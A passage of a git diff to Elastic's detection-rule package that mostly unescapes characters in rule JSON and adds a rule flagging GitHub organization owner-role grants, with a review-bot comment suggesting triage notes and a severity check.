 "risk_score": 47,
 "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -132,7 +132,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_103.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_103.json
index af8ef7334f9..224100854d4 100644
--- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_103.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_104.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_104.json
index a096603be93..87f8939cbe7 100644
--- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_104.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_105.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_105.json
index 1943de6d60c..3cdae390799 100644
--- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_105.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_106.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_106.json
index 8346498b246..b0681e77787 100644
--- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_106.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_107.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_107.json
index a6a642f7fe6..f8db4f10cda 100644
--- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_107.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_1.json b/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_1.json
index 167d33c824d..23f5b31e318 100644
--- a/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_1.json
@@ -46,7 +46,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_2.json b/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_2.json
new file mode 100644
index 00000000000..40cb7874e7e
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_2.json
@@ -0,0 +1,77 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects when a member is granted the organization owner role of a GitHub organization. This role provides admin level privileges. Any new owner role should be investigated to determine its validity. Unauthorized owner roles could indicate compromise within your organization and provide unlimited access to data and settings.",
+ "from": "now-9m",
+ "index": [
+ "logs-github.audit-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "GitHub Owner Role Granted To User",
+ "query": "iam where event.dataset == \"github.audit\" and event.action == \"org.update_member\" and github.permission == \"admin\"\n",
+ "related_integrations": [
+ {
+ "package": "github",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "github.permission",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "9b343b62-d173-4cfd-bd8b-e6379f964ca4",
+ "severity": "medium",
+ "tags": [
+ "Domain: Cloud",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Github"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1098",
+ "name": "Account Manipulation",
+ "reference": "https://attack.mitre.org/techniques/T1098/",
+ "subtechnique": [
+ {
+ "id": "T1098.003",
+ "name": "Additional Cloud Roles",
+ "reference": "https://attack.mitre.org/techniques/T1098/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+ },
+ "id": "9b343b62-d173-4cfd-bd8b-e6379f964ca4_2",
+ "type": "security-rule"
+}
\ No newline at end of file
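Review bot: The new rule ships with no `note` investigation guide and no `false_positives` entry, so an analyst triaging a "GitHub Owner Role Granted To User" alert has only the description to go on, and a routine ownership change made by an existing owner during administrator onboarding or offboarding is indistinguishable from abuse without guidance on what to verify (who performed the change, whether the target account was expected to gain ownership, and whether it was reverted). Consider adding `"false_positives": ["Legitimate ownership changes performed by existing organization owners during administrator onboarding, offboarding or break-glass procedures."]` together with a short `note` listing those triage steps. The query keys on `github.permission == "admin"` while the name and description speak of the owner role; presumably `admin` is the audit-log value that denotes owner, and stating that mapping in the description would save the reader a lookup. Given the description's own wording that the role grants unlimited access to data and settings, `"risk_score": 47` with `"severity": "medium"` reads low for a direct privilege escalation and is worth checking against the package's severity conventions.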
diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_104.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_104.json index 461ad166852..66bcd322bee 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_104.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_105.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_105.json index f9937e16c47..cf896778c6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_105.json 
@@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_106.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_106.json index d3b59b5fedf..bb9fa8c4db6 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_106.json 
@@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_107.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_107.json index 3eacdc89702..d22d70755c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_108.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_108.json index f818f812655..cc4d38e81a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_108.json 
@@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_103.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_103.json index 5dae4f3d062..100b9aa52c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_103.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_104.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_104.json index bdf0f239bdc..b08f9f2fb61 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_104.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_105.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_105.json index ef692fa2030..f137d89cd23 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_105.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_106.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_106.json index a267d40383f..4910d0fa0d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_106.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_107.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_107.json index 886542f9c1a..37ec308d1b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_107.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "\nFor Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nFor Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_4.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_4.json index ae74b2ac180..2b9b55ed923 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_4.json 
+++ b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_4.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_5.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_5.json index 49413c133a3..cfaec07a8eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_5.json +++ b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_5.json @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_6.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_6.json index d61f6038772..7f821e18ab4 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_6.json +++ b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_6.json @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + 